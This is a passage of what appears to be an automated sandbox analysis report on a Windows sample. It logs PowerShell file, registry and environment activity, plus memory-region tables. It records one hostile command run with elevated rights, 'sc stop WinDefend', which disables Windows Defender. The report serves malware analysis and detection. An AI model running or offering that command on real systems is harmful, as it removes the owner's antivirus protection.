| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 4096 |
|
41 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 2530 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 542, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
6 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 3687 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 409, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Read | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 62 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 17 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 57 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 79 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 25 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 54 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
1 | |
| Write | CONOUT$ | size = 1 |
|
2 |
Registry (192)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
6 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
6 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
2 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Module (1)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Environment (120)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
112 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
1 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
1 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Process #23: sc.exe
9
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\syswow64\sc.exe |
| Command Line | sc stop WinDefend |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:02:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:10, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb74 |
| Parent PID | 0x874 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B80
0x
B88
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x000fffff | Private Memory | rw |
|
|
|
- |
| sc.exe.mui | 0x00100000 | 0x0010ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x001f6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0029ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| sc.exe | 0x00da0000 | 0x00dabfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x750d0000 | 0x7512bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75240000 | 0x7527efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752b0000 | 0x752b7fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75310000 | 0x7531bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75320000 | 0x7537ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75390000 | 0x7542ffff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x758f0000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759f0000 | 0x75a08fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75c00000 | 0x75cabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x76110000 | 0x76155fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76540000 | 0x7664ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000773c0000 | 0x773c0000 | 0x774defff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000774e0000 | 0x774e0000 | 0x775d9fff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x777c0000 | 0x7793ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
